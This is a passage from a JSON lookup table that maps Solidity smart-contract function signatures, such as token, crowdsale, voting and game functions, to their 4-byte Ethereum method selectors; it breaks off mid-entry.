"transferERC20Token(address,uint256)": "0xbcba6939", "addIndex(address,address)": "0x0088fed7", "addDividendsForAddress(address,address)": "0x64cbbdc7", "buyWithAddressAndFunction(address,bytes4)": "0xfae4a213", "buyWithAddress(address)": "0xb8f3b75d", "buyWithFunction(bytes4)": "0xb622ab4a", "EOSpace()": "0x3a5eefc0", "theProxy()": "0xbcae9d43", "AWYManKeepChain()": "0xbe96faf7", "Ovation(uint256,string,string)": "0xa5eb1c6d", "CoinPaws()": "0x09fe5fbd", "Anastomos()": "0x586a2d02", "contractFallback(address,uint256,uint256,uint256,uint256,uint256,bytes32)": "0x19cbe072", "transferStackAndCall(address,uint256,uint256,uint256,uint256,uint256,bytes32)": "0x3733b378", "computeAccount(uint256)": "0x811e1468", "BAC(uint256)": "0x68abf22b", "DNT()": "0xbf9222d0", "BCSToken()": "0x614b3e7f", "GoldPurityToken()": "0x8b6d6e48", "createHash(uint256)": "0x12b1cc95", "sendArena(address[],uint256[],uint64)": "0xc29721e0", "setMaxArenaOneDay(uint256)": "0xfe4c39fe", "clearNextArenaTime()": "0x82ea3985", "ArenaPool()": "0xba346d11", "CyberToken()": "0xcdee2112", "Procare()": "0x18c8bda5", "setSellerGuarantee(uint256)": "0xd86892a7", "transferDari(address,address,uint256)": "0xfb35370b", "Punani()": "0x6082a6ad", "BBXCoin()": "0xa7e7d2f4", "returnHostAndCreatorCut(uint256)": "0x3e427e89", "reviseNumAvailable(uint256,uint256)": "0xb19d134d", "backAtIndex(uint256,uint256,uint256)": "0x000a4a7a", "defineReward(string,address,uint256,uint256)": "0x4f23e50a", "continuousBacking()": "0xc2d23e41", "PartialCoin()": "0x666b9132", "EtherTrend()": "0xe0cf715d", "AXNETToken()": "0xe4684d8f", "depositEscapedFunds()": "0xbd541ad0", "setAllowDisbursePaymentWhenPaused(bool)": "0x672f412c", "buyTokensAtRate(address,uint256)": "0x33e06ee7", "sendCoin(address[],uint256[],bytes32)": "0x89b52b9b", "finishCampaign(bytes32)": "0x2a874f34", "getCurrentBalanceForCampaign(bytes32)": "0x257c360d", "getTokenAmountForCampaign(bytes32)": "0x81ffdfab", "getAddressCreatorById(bytes32)": "0x6235e3a2", "checkStatus(bytes32)": "0xa2200278", "destroyCampaign(bytes32)": "0xf158e478", "addTokensToCampaign(bytes32,uint256)": "0xf922da7e", "createCampaign(bytes32,uint256,address)": "0xfb65a3cb", "Deal(address,address,address)": "0xaeac3354", "GDC(uint256,string,uint8,string)": "0x21c24081", "ProofofHumanity()": "0x5ab35302", "AcceptsProofofHumanity(address)": "0x35cbdc25", "vestStage()": "0x1ecc644f", "unlockAmount()": "0x414689ff", "allocateToken()": "0x6c59fb29", "GXCH()": "0x00b08526", "removeName(bytes32)": "0x2fc4eea0", "transferName(address,string)": "0xe1f8922e", "finalizeName(address,string)": "0x2481851a", "registerName(address,string)": "0x4b930503", "EosBlock()": "0x7003a1a3", "addHash(uint256,string)": "0xcab36e92", "showTokensUnfreezeDate(address)": "0xe3ec7584", "unfreezeTokens()": "0xffba376c", "freezeTokens(uint256,uint256)": "0xcad60d17", "giveFreezePermission(address[],bool)": "0xdd60b394", "terminateContract()": "0x2fd949ca", "addAffiliates(address[],uint256[])": "0x693103a0", "RealEstateToken()": "0x9ef965d1", "ToexCoin()": "0xcac6d78f", "KaraOmToken()": "0xd8c4c34e", "StierBitToken()": "0x46f43f15", "abortUpdate()": "0x1478b6af", "ResetUpdateState()": "0xb91dee6c", "updateAdministratorKey(address,address)": "0x74158cd8", "abortTransaction()": "0x370c6001", "ResetTransferState()": "0xf4e42844", "transferViolated(string)": "0x754a347a", "MultiSig()": "0x6bedb845", "withdrawRefBalance()": "0x8e0fee1f", "setRefShare(uint256)": "0x7e179816", "getRefWallet()": "0x51206d81", "rollDice(uint256,address)": "0x5e816740", "MT()": "0x4a1f11a7", "JINGJING()": "0xfd1a0a55", "getSides(uint256)": "0xc7e09d9c", "AK4EtherDelta(address,address,address,uint256,uint256,uint256)": "0xb6e3943a", "InjurymapCoin()": "0xf0ddc0c6", "currentBetLimit()": "0xc9e3af7e", "currentDifficulty()": "0x5c062d6c", "AdjustDifficulty(uint256)": "0x38503f55", "AdjustBetAmounts(uint256)": "0xd191b336", "setContractBridgeAddress(address)": "0x7762f046", "KergToken(uint256,string,uint8,string)": "0x542fce21", "one_two(uint8)": "0xaca233fd", "Balicoin()": "0xacd485fe", "setStatus(uint256,uint8)": "0xd896dd64", "getCitizenCharacteristics(uint256)": "0x31baa8ae", "_extractRawResource(address,uint256,bytes)": "0x681185ab", "target1()": "0xeac3e799", "withdrawAllToOwner()": "0x80710f39", "transferTokensToContractOwner(uint256)": "0x7d19e292", "transferAllTokensToOwner()": "0x8bd8669e", "transferTokensTo(address,uint256)": "0x2be8c2a5", "buyTokens(uint256,uint256)": "0x7975ce28", "getPriceChange(uint256)": "0x3b0b037a", "setNewPriceInFinney(uint256)": "0x40c48c8d", "setManager(address)": "0xd0ebdbe7", "finneyToWei(uint256)": "0xf9794660", "weiToFinney(uint256)": "0xe25876d3", "setErc20TokensContract(address)": "0x20857295", "ICO()": "0x273ba6bb", "DDJBTC()": "0xa0f0e95f", "invalidate(bytes32)": "0x69ecc3cf", "deed(bytes32)": "0xe4ce6ccf", "getStatusAndOutcome()": "0x6bcc035a", "verifiedAgeOver(address,uint256)": "0x273b465b", "setAge(uint256)": "0xd5dcf127", "testRegisterAndVerified()": "0x0ea7ee82", "update(uint256,uint256,bytes32)": "0x5a0178af", "add(uint256,bytes32)": "0x764e971f", "BasicMilestones(address,address,bool)": "0x92a81127", "ERCToken(uint256)": "0x9b7c08b8", "tokens(address)": "0xe4860339", "joinBytes(bytes,bytes,bytes)": "0x48401f1a", "joinBytes(bytes,bytes)": "0xbe73d879", "testTransferTwoTokensAndReturnFunds()": "0x66180bc7", "testTransferNoMoreThanTokenBalance()": "0xb4024d9f", "testTransferTokenAllowanceAndReturnFunds()": "0x16c7f79f", "testNoTokenTransferIfNotApproved()": "0xd740766e", "testFailOnFailedCall()": "0xed40175d", "testFailOnFailedTransfer()": "0x0a0b3139", "testNoTokensTwoCalls()": "0x508b0955", "testNoTokensOneCall()": "0x957c0ff2", "testNoTokensNoCalls()": "0xccc5d05f", "NotThrowingToken(uint256)": "0x86216ace", "ok(uint256)": "0x80972a7d", "StorageEther(address,address,address[],uint256,string,string,uint8)": "0xfe9d7121", "lockToken()": "0xbca7a9e2", "setCreditMcAddress(address)": "0xc501b87f", "setCreditGameAddress(address)": "0x106d2813", "setCreditDaoAddress(address)": "0x46f92818", "getCreditBondAddress()": "0x029c19aa", "setCreditBond(address)": "0xa3d3a265", "mintBonusTokensForGames(int256,uint256)": "0x9c60839e", "claimGameReward(address,uint256,uint256)": "0x7bbbe9fd", "claimBondReward()": "0x63586d6a", "mintMigrationTokens(int256,address,uint256)": "0xe3cc3570", "lockBalance(uint256,uint256)": "0x191723ed", "getAccountData(address)": "0x5d78650e", "CreditBIT()": "0xd3efa856", "Example2(string)": "0xaa89376a", "getVoter(uint256)": "0xd07bff0c", "getVoteCount()": "0xe7b3387c", "castVote(bytes32[])": "0x62715547", "addVoter(address,bytes32[])": "0x7ffcb093", "Election(bytes32[],uint256,uint256,uint256)": "0xcf22c803", "GorillaSale(uint256,uint256,uint256,address)": "0x387f4172", "ownerWithdrawERC20Token(address,uint256)": "0x5de01497", "takerSellAsset(uint256)": "0xeff883bd", "takerBuyAsset()": "0xc60ccb0e", "makerWithdrawEther(uint256)": "0x2170ebf7", "makerWithdrawERC20Token(address,uint256)": "0xc34764cf", "makerWithdrawAsset(uint256)": "0xcd53a3b7", "makerDepositEther()": "0x919f8cfc", "TokenTrader(address,uint256,uint256,uint256,bool,bool)": "0x87b751ae", "FIXED()": "0x7f50c74b", "findAddressByEndpoint(int256,string)": "0xf7eb4017", "findEndpointByAddress(int256,address,address)": "0x8244b8c8", "testInsert()": "0xbc38a991", "insertAccount(bytes32,string,uint256,string,string)": "0xccb2e9a4", "WHAuthorizeAddress()": "0x9cc4da3b", "doesContractExist(address,address)": "0x1bc2dd5a", "setWorkerPort(uint256)": "0x83d2421b", "setWorkerDtPort(uint256)": "0x47b950b6", "changeWorkerPrice(uint256)": "0x430fe5f0", "registerWorker(uint256,uint256,bytes32,bytes32)": "0x23ed0a2e", "buyContract(address,uint256)": "0x80c30f3d", "forwardCall(address,uint256,bytes)": "0x6effec50", "claimContractOwnership()": "0x4592cd1d", "addContractOwner(address)": "0x6e7bc3e5", "triggerEvent()": "0xede48fb7", "neighbor(uint256,uint8)": "0xe6f3ae3c", "report_death(uint256,uint256)": "0xf0a45cff", "spawn(uint256,address)": "0x61f2de50", "harvest(uint256)": "0xddc63262", "enter_square(uint256)": "0x17a650cc", "leave_square(uint256)": "0xb5a27a21", "add_creature(uint256,address)": "0xba50f965", "deposit_eth(uint8,uint256)": "0x98804938", "replace_square(uint256,bool,uint256,address)": "0x4edccd31", "set_game(address)": "0x45c5b8ac", "set_harvest_amount(uint256)": "0x680f0eda", "set_dimensions(uint256,uint256)": "0x3cb260b2", "set_admin(address)": "0xe9333fab", "all_obstacles()": "0xb070bdc6", "all_creatures()": "0xeecc3be8", "all_eth()": "0xc7df0a90", "num_squares()": "0x0539c6d6", "close(uint256,bytes,uint256,uint8[],bytes32[],bytes32[])": "0xaaab51c9", "getLockedStateAddress()": "0x831121dc", "getStateAt(uint256)": "0x846e832d", "getStateLength()": "0xf09649ed", "createLockedState()": "0xb3c3699f", "Adjudicator(address[],uint256,uint256)": "0xb80540c0", "Initialize(address,address,bytes32,address,uint256,bytes32,address,uint256,bytes32,uint256)": "0x8628892e", "HashOfDB()": "0x3473f5e4", "getGasLimit()": "0x1a93d1c3", "setData(string)": "0x47064d6a", "channelManagerAddresses()": "0x640191e2", "tokenAddresses()": "0xa9989b93", "channelManagerByToken(address,address)": "0x258c4f63", "addToken(address,address)": "0x5476bd72", "endMinting()": "0xef70aebf", "freezeContract(bool,uint8[],bytes32[],bytes32[])": "0xa7bf8921", "offlineTransfer(address,address[],uint256[],uint8[],bytes32[],bytes32[])": "0x10d5105d", "internalTransfer()": "0x42a8f2f4", "OfflineMultiSig(address,address,address[],uint256)": "0xd413bd66", "confirmAdminTx()": "0x15efc893", "confirmTransactionSig(bytes32)": "0xb210dac9", "calculateTxHash(address,address[],uint256[])": "0xf91c339e", "ContributionWallet(address,address)": "0x7fc55eb4", "totalCollected()": "0xe29eb836", "doBuy(address,uint256,bool)": "0x78d63908", "buyGuaranteed(address)": "0x91ea59eb", "buyNormal(address)": "0x271fe8be", "setGuaranteedAddress(address,uint256)": "0xcc9b7826", "initialize(address,address,uint256,uint256,address,address,address,address)": "0x9b3ee16e", "REALCrowdsale()": "0xc344bc4a", "sendAliceBlue(address,uint16,uint256,bytes)": "0x7b1707ee", "Ddjtab(uint256,string,string)": "0x2b770ee9", "_createPermission(bytes32,address[],bytes4[])": "0x7a2cc6d8", "createPermission(bytes32,address[],bytes4[])": "0xae8f1d29", "Party(string,address,string)": "0x96fb2e62", "designatedReporterWasCorrect()": "0x8ed882c5", "getFeeWindow()": "0xf77f29b1", "designatedReporterShowed()": "0x3bf8f34a", "getReportTimestamp()": "0x94a771d7", "getDesignatedReporter()": "0x5b6e2492", "getStake()": "0xfc0e3d90", "forkAndRedeem()": "0x1d7b6d58", "migrateREP()": "0x2628803f", "resetReportTimestamp()": "0xa00413bd", "withdrawInEmergency()": "0xc4c0698d", "report(address,bytes32,uint256[],bool)": "0x41c3e7c7", "devuelveNombreApp(address)": "0x58e3e914", "devuelveAddressUsuario(bytes32)": "0xdd523559", "devuelveApps(bytes32)": "0x5eab15e4", "devuelveRoles(bytes32)": "0xb6f73bb9", "controla(address,bytes32,bytes32)": "0x9de18f9c", "comprueba(address,bytes32)": "0xf0ecadaf", "devuelveApproles(bytes32)": "0x96a44d35", "devuelveAppaddr(bytes32)": "0xba9d4c09", "devuelveTodasApps()": "0xb3f523a8", "devuelveUsers()": "0x41e14251", "registrarApp(bytes32,address,bytes32[])": "0xd6f50ed6", "borrarRegistro(bytes32,bytes32)": "0x2d6df368", "registrarUsuario(bytes32,bytes32,bytes32,bytes32)": "0x3aa0eafb", "IdentityManager(bytes32)": "0x1a3d96ff", "setDelegadoDeEscuela(bytes32)": "0x68a7e1c4", "setDelegadoDeEscuelaVerify(bytes32)": "0x1de14175", "setVicepresidenteDeMesa(bytes32,uint256,bytes32)": "0xd7dbdbe3", "setPresidenteDeMesa(bytes32,uint256,bytes32)": "0xe6717d3f", "setPresidenteDeMesaVerify(bytes32,uint256,bytes32)": "0x9231e0f9", "setFiscal(uint256,bytes32)": "0x6a3bb8cc", "setFiscalVerify(uint256,bytes32)": "0x67c21fe5", "getMesas()": "0xb9ccaed2", "getMesa(uint256)": "0x51758666", "existsMesa(uint256)": "0x6297dbf4", "mesasCreated()": "0x0a59b81b", "mesasCreatedVerify()": "0xf1c461c7", "createMesa(uint256,address)": "0x15ee3726", "createMesaVerify(bytes32[])": "0x7ed8b225", "getRepPriceInAttoEth()": "0x0f8fd363", "setRepPriceInAttoEth(uint256)": "0xac4d8a26", "PausableTokenMock(address,uint256)": "0x5bdaeba2", "faucetLif()": "0xe1181c73", "transferDataFrom(address,address,uint256,bytes)": "0xefef445b", "transferData(address,uint256,bytes)": "0xc0e37b15", "approveData(address,uint256,bytes)": "0x6ef3ef7e", "testFailTransferFromSelfNonArbitrarySize()": "0x3eefef7b", "testTransferFromSelf()": "0xfad356f8", "getCurrentPrice()": "0xeb91d37e", "getCurrentMilestone()": "0x299a017c", "getPricingEndsAt()": "0x6f079f90", "getPricingStartsAt()": "0x2c9a0a95", "getLastMilestone()": "0xb3e366ab", "getFirstMilestone()": "0x9d5839e3", "getMilestone(uint256)": "0x2442e1cb", "setPreicoAddress(address,uint256)": "0xe474f97a", "MilestonePricing(uint256[])": "0x01890840", "mul256()": "0x204525e6", "getWinnerAddress(uint256)": "0x515371a3", "getWinnerUrl(uint256)": "0x1b482452", "getAuctionAddress(uint256)": "0xdf6378e9", "acceptAuctionResult(address,uint256,string)": "0xa925252a", "isInitialized()": "0x392e53cd", "initialize(uint256,uint256,uint256,uint256,uint256,uint256)": "0x2d7aa82b", "getPaidOrderByIndex(uint256)": "0xdc17e808", "getFeeValue(address)": "0x38a964d6", "clearPoolsDone()": "0xbe90be7f", "sendPoolMoney(uint256)": "0x3ad9f722", "checkPoolDone(uint256)": "0x1bb4067b", "checkPoolsDone()": "0x7d12b689", "checkPoolEnd(uint256)": "0x90baaa5c", "checkPoolsEnd()": "0x16ab4b17", "buyTicket(uint256,uint256,address)": "0x008e6865", "getPoolHistory(uint256)": "0x21f4d29f", "getPoolHistoryCount()": "0x832bc28d", "getPoolDone(uint256)": "0x232fd216", "getPoolDoneCount()": "0x7af91032", "getPool(uint256)": "0x068bcd8d", "getPoolCount()": "0x8eec5d70", "addPool(uint256,uint256,uint256)": "0x9d463b99", "updateSeed()": "0xbb1953fe", "PoolManager(address)": "0x026654bf", "onMoneySent()": "0xefeb4ad7", "canTerminate()": "0xc7c3b1c1", "addPlayer(address,uint256,uint256)": "0xc01e38e6", "checkEnd()": "0x4b084d49", "isMoneySent()": "0xa410424e", "isTerminated()": "0xd1cc9976", "getDurationS()": "0x00bde030", "getDuration()": "0xad2e8c9b", "getAvailableTicketCount()": "0x23b364ab", "getBoughtTicketCount()": "0x66d10688", "getTicketCount()": "0x21c63a47", "getCurrAmount()": "0x1716f47e", "getStartBlock()": "0xa5f18c01", "SmartPool(uint256,uint256,uint256)": "0xec40c43d", "playSystem(uint8,uint8,uint8,address)": "0x92af0605", "airdropFor(address)": "0x4faf9420", "setCrowdsaleState()": "0xb5cb0611", "editContributors(address[],uint256[],bool[],uint256[],uint256[])": "0xb70949c9", "setTokenInfo(string,string)": "0xda262f58", "BNIToken()": "0xcb6bfa03", "SWAPCOINZ()": "0x24eebc47", "destroyChildren(uint256)": "0xe735f667", "makeChild()": "0x95475c1f", "mk_contract_address(address,uint256)": "0x777ab367", "count_bytes(uint256)": "0x44cc129e", "reclaimParsecCredit()": "0x1ebcf2fb", "_sendTo(address,uint256)": "0x71f84164", "_receiveFrom(address,uint256)": "0xc16ae3ce", "_bidLaterShip(uint256,uint256,address,address)": "0x79bd04f2", "_bidFirstShip(uint256,address,address)": "0x618a057a", "getShipPrice(uint256,uint256)": "0x8ed06b62", "getShipPrice(uint256)": "0x9edf256d", "getLastAuctionWinsDate()": "0xc256d578", "getLastAuctionsWinningBid()": "0x117e62fd", "getLastAuctionedShipId()": "0x46021deb", "getFirstAuctionsEndDate()": "0x16dd68b1", "getFirstAuctionsExtendableStartDate()": "0x248e150a", "concludeFirstAuction()": "0x002d7c9d", "getFirstAuctionsRemainingDuration()": "0x5cc2e6aa", "_getShipPrice(uint256,uint256)": "0xe21aaa0f", "_getShipColor(uint256)": "0x059efd9e", "_getShipType(uint256)": "0x45fd2478", "_getShipName(uint256)": "0x11d295bf", "getShip(uint256)": "0x4025b22d", "_updateReferrerFor(address,address)": "0x9f1f2d77", "SenseProtocol()": "0x98593b7a", "NotCoin(string,string,uint8)": "0xaf310f02", "TrueToken()": "0x08d605f2", "closeTokenSale()": "0xa387cf34", "updateEndDate(uint256)": "0xef2bbbdf", "ACNNIco(uint256,uint256,uint256,address,address)": "0xa339c18f", "ACNN()": "0xb578e764", "BLTToken()": "0x146dd227", "PriceUpdate()": "0x79fd8c24", "saleUnpause()": "0xc65ac542", "salePause()": "0xbcff702b", "Hybrid()": "0x15764334", "ShieldCureToken()": "0x9774c190", "prepare(uint256)": "0xcb577480", "HEAL()": "0x407f56e5", "calcWinner(uint256,uint256,uint256,uint256)": "0x17b9a28e", "publicGetParticipants(uint256)": "0x09df3248", "publicGetRound()": "0x5c1b94d1", "ownerDestroy()": "0x2957da23", "PiBetaToken()": "0x6d3e1a74", "getSquirrelmasterReq()": "0x64eaff54", "getMySquirrel()": "0x2871f2c0", "getFreeSquirrel()": "0x2a5854d9", "becomeSquirrelmaster()": "0x57aeeb25", "SquirrelFarmer()": "0xa6c98142", "Partners(address)": "0x8e9b7ab8", "_updateCurrentPeriod()": "0x944abc22", "triggerWithdraw(address)": "0x4f69dd3d", "_withdraw(address)": "0xda1aaa59", "addRecipient(address,uint256)": "0xf7982243", "_recalculateAvailable(address)": "0x37247af5", "Basic(address)": "0x5135f714", "GetTokenAddress(address)": "0x72117821", "startStop()": "0x71098a35", "unfreezeTeamTokens(address)": "0x01d6e35b", "NRM()": "0x6787416d", "VLADALINA()": "0xcc7f365c", "DepositFund()": "0xab225edc", "disabled()": "0xee070805", "withdrawsCount()": "0x42c62865", "totalLuxCents()": "0x05b35924", "buyoutWallet()": "0x2dc8be64", "lastTotalSupply()": "0xb6508067", "SUPPLY_FOR_MARKETING()": "0x1edc5ce0", "isInRoundTwoState()": "0xd1c72c89", "freezing()": "0x5b814e16", "lamboPresaleAddress()": "0x4e191701", "lastWithdrawal()": "0x1dd300ce", "DevPromotionsMarketingSupply()": "0xbf99669d", "bountyAllocation()": "0xf6b9d05d", "coinsIssuedMkt()": "0xdcbc84ab", "goldReward()": "0x60e587f9", "tokenMainSale()": "0x87210f63", "rateOfEther()": "0xf6f96d91", "privateStage()": "0xed9ff004", "forTeamETH()": "0x77fbe611", "phase_2_token_price()": "0xc5d14955", "ResolverNode()": "0x26500c84", "controllerSucceeded()": "0x6cff8244", "isBuyStopped()": "0x2bbf54e8", "gameGiftSentAmount()": "0x78e8488d", "whitelistManager()": "0x26563b40", "startEarlyAdopters()": "0xc467706d", "creatorReward()": "0xd8fd1ed9", "getNamelistLength()": "0x50ec6b1b", "sigDestinationApprove()": "0x44bb60cf", "bonussale_Cap()": "0xa7c961d5", "nextroundGOTCHatcontract()": "0x07801b5c", "remainingTransfered()": "0x47b79a31", "MAX_SALE_SUPPLY()": "0x571fe016", "ESCROW_WALLET()": "0x8385fa0f", "checkInterval()": "0x838c29b6", "pricePresale()": "0x9147dd1b", "fundAddress()": "0xe82bef29", "nextFlexibleReward()": "0x86e3060d", "devWalletLocked()": "0xef3377ca", "currentFlowerPrice()": "0x5e2ea799", "airdropWallet5Pct()": "0x1615d035", "initPrice()": "0xb6add0f4", "flowingHairAddress()": "0x55ce596b", "BONUS_ICO_PERIOD_ONE()": "0x6917fd5e", "whoHasTheBiggestDick()": "0xb2406905", "CREATION_LIMIT()": "0xd72b6d3b", "ABDEL_ADDRESS()": "0x89b2b09e", "currentPeriodStartBlock()": "0xaa93334d", "BOUNTY_ADDRESS()": "0x31cba838", "maxMintBlock()": "0x9d96be58", "walletDev()": "0x8c254c0b", "challengeOwner()": "0x19375602", "totalSupplyPretty()": "0xd833590f", "numOfWinner()": "0x3cb6465e", "employeePoolTokens()": "0x485587a2", "winnerConfirmed()": "0x7f7634ba", "maxBlockActions()": "0xbb826e50", "seed_multiplier()": "0x251c7182", "dateTransferable()": "0xf972e2bf", "MAX_PRIVATE()": "0x27d94182", "swpFund()": "0x7e1934f9", "registrarAddress()": "0x0ce11a77", "moveStageWithdrawn()": "0x937a7ac5", "isPresaleEnd()": "0x3c1800cd", "coinsIssuedTotal()": "0x688521b4", "presaleFundingGoal()": "0x5f88bff0", "freezingManager()": "0x247cff43", "cdtTokenAddress()": "0x518fd40e", "tokenManagerAddress()": "0xbc4c594b", "hasRequiredStateChanges()": "0xfa9d2352", "endICOStage7()": "0xf31a18a5", "finishedIssuerMinting()": "0x9c3fe721", "updateAvailable()": "0x007e5d08", "speed_limit()": "0x5727eec0", "YumeriumTeamWallet()": "0x332954c0", "PRE_SALE_TOKEN_CAP()": "0x7691471c", "isPreICOPrivateOpened()": "0x57ccbe28", "getMin(uint128[])": "0x4d846a99", "sellDeadline2()": "0x9aea020b", "retrieveWCT2()": "0x82648222", "finalistTeamFIFAIdsSet()": "0x194809a6", "newIssuer()": "0x71a04009", "TOKEN_FIFTH_PRICE_RATE()": "0xf5173120", "ETHER_MAX_CONTRIB()": "0xf3b5678f", "etherBalance()": "0xad66e52a", "constructionTime()": "0xf06c5610", "wolkInc()": "0xe1d30979", "capitalPctBips()": "0x21bded12", "initMonsterClassSiteSet()": "0x20566ae8", "next()": "0x4c8fe526", "amountMintPerDuration()": "0xeeb0af89", "ACCEPTED_AMOUNT()": "0x4917c302", "nextsize()": "0x31d4116f", "payoutInterval()": "0x09e785e1", "payincount()": "0xdacef51b", "totaldivineTokensIssued()": "0xcde02b25", "lifeFactor_i()": "0x885e401e", "assignedAmountToAngelInvestment()": "0xb98a5418", "MAXCAP_TOKENS_ICO()": "0x22245b64", "WAITTIMEUNTILWITHDRAWORTRANSFER()": "0x3760ceb0", "HART_NETWORK_ID()": "0xd4e19bd1", "transferManager()": "0x46ea2552", "BountyManager()": "0x0e9279a0", "RaidenToken(address,address,address,address,uint256)": "0xede8cf8f", "create(address,address,bool)": "0x2111006f", "MilestonesFactory(address)": "0xc5854113", "slice(bytes32[],uint256,uint256)": "0xa8825650", "RaffleInternetBook(string,uint256)": "0x69c63434", "ExpRegistrar()": "0xca95402d", "login(address,address)": "0x8ffc024f", "checkUserAndInitIfNecessary(address,address)": "0xf60e28f7", "setUser(address,address,string,string,string,bytes32)": "0x31b259cf", "getStatus(address,address)": "0x889e5073", "isUserExists(address,address)": "0xa1a887b8", "getUsersCount(address)": "0x78f08268", "setStatus(address,address,uint8)": "0x895c1bdb", "setController(address,address)": "0x7b7d6c68", "create(bytes32,address,bytes32,bytes32,address,bytes32)": "0xaafbd3da", "getEmail(address,address)": "0x2e271ff3", "setEmail(string)": "0x282b065a", "_deliverTokens(address,uint256)": "0xed2cbf06", "remainingTokens()": "0xbf583903", "AllowanceCrowdsale(address)": "0x07209e2b", "newCampaignAccount(uint256)": "0xe190264f", "CampaignAccountFactory(address)": "0x2b920a6b", "campaignOf(address)": "0xa36f259d", "accountOf(uint256)": "0x8f4e4321", "initiatedBy(address)": "0xf03342ad", "getSpotPrice()": "0xdc76fabc", "getMoneyness()": "0xebf31253", "isMature()": "0xae4e7fdf", "exercise()": "0xd32cb0fe", "authorizeTradingAccounts(uint256)": "0xdd9bf998", "initialize(address,address,address,bytes32,uint256,uint256,uint256)": "0xa28c76cc", "FeedBackedCall()": "0x58463e11", "MyToken(uint256,string,uint8,string,string)": "0x668ad45f", "testEvents()": "0x0e5356ec", "testEvent(int256,int256,uint256,uint256,string,string)": "0xc18ca54c", "testIntDynArray(int256[])": "0x6ca5bdf2", "testIntFixedArray(int256[3])": "0x8e755125", "testAddress(address)": "0x42f45790", "testInt(int256)": "0x6017d51d", "testUint(int256,uint256)": "0xc882ee8c", "testString(string)": "0x61cb5a01", "add(uint64,uint64)": "0x6e2c732d", "sub(uint64,uint64)": "0x911b5f4e", "div(uint64,uint64)": "0xf1a0a85c", "mul(uint64,uint64)": "0x22c6ae15", "newGroup()": "0xae025faa", "process(address,address,address,string,string)": "0xdf018dbd", "enable()": "0xa3907d71", "getUserGroup(address)": "0xdc79b176", "setUserGroup(address,address)": "0xc599b77f", "AuthorityFilter()": "0x0bba3065", "setRewardStatus(address,bool)": "0xf77f2f2e", "getRewardStatus(address)": "0x1cef92b1", "drainETH()": "0xe264172c", "requestDividends()": "0xd4a9991f", "checkProfit(address)": "0xa50e20c1", "sendEthToContract()": "0x713f5e4d", "checkWhitelistExist(address)": "0x997676c3", "removeWhiteListAddress(address[])": "0x6727cc2d", "addWhiteListAddress(address[])": "0x67316b3f", "SMSReward(address)": "0xa35132ac", "setRLCPerETH(uint256)": "0x61046d8b", "bonus(uint256)": "0x24749b59", "emitRLC(uint256)": "0x3abee034", "receiveBTC(address,string,address,uint256,string)": "0xcde2d72a", "receiveETH(address)": "0x8c53f61d", "Crowdsale()": "0xfb6bbbce", "removeVotersVote(address)": "0x0f39c6ab", "getVotersCandidateVote()": "0x22518a75", "getVotersPartyVote()": "0x3b7ff404", "totalVotesForCandidate(uint256)": "0xbc6c4d0f", "totalVotesForParty(uint256)": "0x9a6dfeff", "startElection(uint256)": "0x6d32dc4b", "Ballot(bytes32[],bytes32[])": "0xa9820ead", "claimReserveTokens()": "0x5b8807d9", "RocketPoolReserveFund(address)": "0xb9c8559d", "getSender()": "0x5e01eb5a", "Transaction1()": "0xb548c6f6", "mul64()": "0xc5671148", "downtime()": "0xe91d1ea0", "downs(address)": "0x45a40478", "createDownRequest(address,uint256)": "0x71d7c621", "downTick(address,uint256)": "0x9938fdd1", "powerUp(address,address,uint256)": "0x94009bbc", "powerTotalSupply()": "0x995cc82b", "authorizedPower()": "0xe894000b", "outstandingPower()": "0xe883d157", "powerBalanceOf(address)": "0x13373786", "purchase(address,uint256,uint256)": "0x98968f15", "transferFrom(address,address,address,uint256,bytes)": "0x4a280a55", "transfer(address,address,uint256,bytes)": "0x12a837b4", "burnPool()": "0xa54b2a73", "babzBalanceOf(address)": "0x9ab95202", "BaseStoreToken()": "0xd6d707a6", "getMarketID()": "0x5e21f687", "getNegID()": "0xecc99af0", "getConID()": "0xe6569b1e", "vest()": "0x458efde3", "_currentIcoPhaseMinimum()": "0xe25c80d0", "_currentIcoPhaseBonus()": "0xc2a15dbb", "mintReservedTokens()": "0x3eefe239", "addTokensMulti(address[],address,uint256[])": "0xeb810864", "decreaseTokensMulti(address[],address,uint256[])": "0xea961d78", "decreaseTokens(address,address,uint256)": "0x857e6a99", "requestPayout(uint256,address,address)": "0x59a2c86f", "Profeee()": "0x44e44e0d", "CoffeeToken(address)": "0x6141d5d0", "HCToken()": "0x07133caf", "BatakToken()": "0x95aaa5d9", "CreditAsiaCoin()": "0xb4c98496", "Visor()": "0xd0fef78f", "lockcheck(uint256)": "0x75229e28", "locked(address[],uint256[])": "0xa55deccb", "TrineChain()": "0xa4828bca", "Fortecoin()": "0xed11d089", "updateCurrentStage()": "0xa3a51983", "addStageCrowdsale(address)": "0x25c782d7", "sellToAddress(uint256,address)": "0xa75252ea", "transferWithEther(address,uint256)": "0xeb29d9ea", "contTransfer(address,uint256)": "0x207f4f38", "setScale(uint256,uint256)": "0x12df172d", "contBuy(address,uint256)": "0x58462b36", "TokenBBBasic()": "0xfbf350e2", "releaseTenPercent()": "0xcc24f571", "Crowdsale(address,uint256,uint256,uint256,address,address,uint256)": "0xcb885a36", "getAllForPubKeyBetween(bytes32,uint256,uint256)": "0x6360edc1", "getAllForPubKey(bytes32)": "0x9b986550", "nDelegations(bytes32)": "0x0a0e7883", "dLogN()": "0xf91c26a5", "addUntrustedSelfDelegation(bytes32,bytes32,bytes32[2])": "0x70ebf814", "changeAllowances(address[],uint256[])": "0x6ce62c61", "GNTTokenERC20(uint256,string,string)": "0x02acc6b6", "EXTRADECOIN(string,string,address)": "0x7a28e60f", "BOC()": "0x02c4980c", "EICQ()": "0x73681818", "tokensOfSell()": "0xa80bffb6", "_createCaptainToken(address,uint256,uint32,uint32,uint32,uint32,uint32,uint32)": "0xc76f80c8", "round(uint256,uint256)": "0xa17ca853", "ln_fixed3_lnr_18(uint256,uint256)": "0x9d07ff80", "ln_fixed3_lnr(uint256,uint256)": "0x6f17a516", "ln_fixed3(uint256,uint256)": "0xc5a104d9", "GoldenLightChainToken(uint256,string,uint8,string)": "0xd10523b7", "createSwap(bytes20,address,uint256,address)": "0xaa2e7ea0", "DIYToken()": "0x7ce5f9da", "changeEthReward(uint256)": "0x61523f2e", "BrokerImp(address,address,uint256,address,uint256)": "0x0067a9fb", "IRE()": "0x1a7f8588", "Fastmarketnetwork()": "0xe899e848", "vest(address,uint256,uint256,uint256,uint256)": "0xb395cb3c", "_sell(address,uint256)": "0x4e9faaba", "_buy()": "0x9299f294", "transferEth(uint256)": "0x1f57256f", "setSellOpen(bool)": "0x603d1d1c", "setBuyOpen(bool)": "0x9769eacf", "GrowToken()": 